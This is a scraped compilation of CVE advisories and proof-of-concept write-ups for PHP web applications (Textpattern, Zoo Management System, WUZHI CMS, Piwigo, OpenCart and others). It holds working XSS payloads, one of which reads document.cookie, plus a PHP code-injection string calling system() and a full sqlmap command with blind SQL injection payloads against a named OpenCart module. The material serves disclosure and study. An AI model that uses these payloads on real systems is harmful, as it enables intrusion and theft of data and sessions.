Textpattern CMS v4.8.7 and older vulnerability exists through Sensitive Cookie in HTTPS Session Without 'Secure' Attribute via textpattern/lib/txplib_misc.php. The secure flag is not set for txp_login session cookie in the application. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site.

Permalink

Browse files

Secure cookie test

*   Loading branch information

1 parent 925e363 commit 211fab0093999f59b0b61682aa988ac7d8337aa9

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -1033,7 +1033,7 @@ function set\_cookie($name, $value = '', $options = array())

'expires' => time() - 3600,

'path' => '',

'domain' => '',

'secure' => false,

'secure' => strtolower(PROTOCOL) == 'https://',

'httponly' => false,

'samesite' => 'Lax' // None || Lax || Strict

);

**0 comments on commit 211fab0**

Please sign in to comment.

CVE-2021-40642: Secure cookie test · textpattern/textpattern@211fab0

A vulnerability classified as problematic has been found in Easy Table Plugin 1.6. This affects an unknown part of the file /wordpress/wp-admin/options-general.php. The manipulation with the input "><script>alert(1)</script> leads to basic cross site scripting. It is possible to initiate the attack remotely.

CVE-2017-20108

SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.

    # Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)# Date: 06/22/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: Server: XAMPP on Windows 10 # CVE: CVE-2022-31897# Description:Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.# Impact:An attacker could steal cookies with a crafted URL sent to the victims.# Exploit:Visit the following page: 1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>2) Alert pop up is fired!# Image poc:https://ibb.co/8XKDgJX -> Registration pagehttps://ibb.co/mTTmTmy -> XSS

CVE-2022-31897: Zoo Management System 1.0 Cross Site Scripting ≈ Packet Storm

In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.

The following is a list of my collected CVE's

**Nagios XI**

Nagios XI is an enterprise monitoring solution, see https://www.nagios.com/products/nagios-xi/ for more information. During an pentest i've found 4 0days:

*   CVE-2022-29270 No password conformation during e-mail change leads to account takeover
*   CVE-2022-29272 Open redirect in login form
*   CVE-2022-29269 HTML injection in schedueld report mails
*   CVE-2022-29271 Permissions issue where read-only users could schedule downtimes using downtime.php

**Glory Systems, RBW-100**

The Glory RBW-100 banknote recycling system controls cash and removes the need for manual note handling. I've found two vulnerabilities in the Font Circle Controller management interface that can lead to a reverse root-shell:

*   CVE-2019-10479 - Default hardcoded credentials
*   CVE-2019-10478 - Arbitrary file upload

See a POC, combining these two vulnerabilities in action: https://youtu.be/MSKDfLpPOLw

CVE-2022-29272: GitHub - sT0wn-nl/CVEs: The following is a list of my collected CVE's

A reflected Cross Site Scripting (XSS) in wuzhicms v4.1.0 allows remote attackers to execute arbitrary web script or HTML via the imgurl parameter.

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=core&f=index&\_su=wuzhicms.

POC  
ji</textarea> <img/src=1 onerror=alert(document.cookie)>

Vulnerability trigger point  
http://localhost/index.php?m=core&f=index&\_su=wuzhicms. When attacker access -system settings - basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully.

1、choose this part and write poc to \[statcode\] form  

2、submit and view webpage

CVE-2020-19897: wuzhicms v4.1.0 statcode reflected xss vulnerability  · Issue #183 · wuzhicms/wuzhicms

File inclusion vulnerability in Minicms v1.9 allows remote attackers to execute arbitary PHP code via post-edit.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-19896: file inclusion vulnerability · Issue #36 · bg5sbk/MiniCMS

Silverstripe silverstripe/assets through 1.10 allows XSS.

CVE-2022-29858: Security Releases

piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor.

**Piwigo has a background command execution vulnerability**

Command injection vulnerability trigger point

Use admin to enter the background

Click settings to come to this page

Write in it

<?phpvar\_dump(1);}if(1){system('calc');?>

Next breakpoint single step debugging

You will find that this sentence is implemented here

**code analysis**

Text is passed in $content without filtering_ File and then pass in the function

The incoming code is spliced here. Caused code execution

CVE-2021-40553: vuln/README.md at main · Yang9999999/vuln

The So Filter Shop By module for OpenCart version 3.x suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection# Date: 28/06/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633# Version: V3.X# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Filter Shop By Module is compatible with any Opencart allows SQL Injection via parameter 'att_value_id , manu_value_id , opt_value_id , subcate_value_id ' in /index.php?route=extension/module/so_filter_shop_by/filter_data. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Sqlmap command :sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agentRequest :===========POST /index.php?route=extension/module/so_filter_shop_by/filter_data HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-aliveatt_value_id=1&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud===========Output :Parameter: att_value_id (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: att_value_id=-7402) OR 6808=6808 AND (4992=4992&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: att_value_id=1) AND (SELECT 6365 FROM (SELECT(SLEEP(5)))qqBP) AND (7704=7704&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud

OpenCart 3.x So Filter Shop By SQL Injection

Zoo Management System version suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Zoo Management System 1.0 - Stored Cross-Site-Scripting (XSS)# Date: 05/26/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: Server: XAMPP# Description:Zoo Management System 1.0 is vulnerable to a stored cross site scripting in “Add Classification” functionality of the admin panel.# Exploit:1)Goto: http://localhost/admin/public_html/admin_login and login with the provided credentials2)Goto: http://localhost/admin/public_html/save_classification3)The “Classification Display Name” and “Classification Table Name” are both vulnerable so you can put <script>alert(“xss”)</script> in one of them4)Goto: http://localhost/admin/public_html/view_classifications5) Stored XSS payload is fired# Image Poc:https://ibb.co/FXc5zLthttps://ibb.co/CtFSQrQ

Tag

#php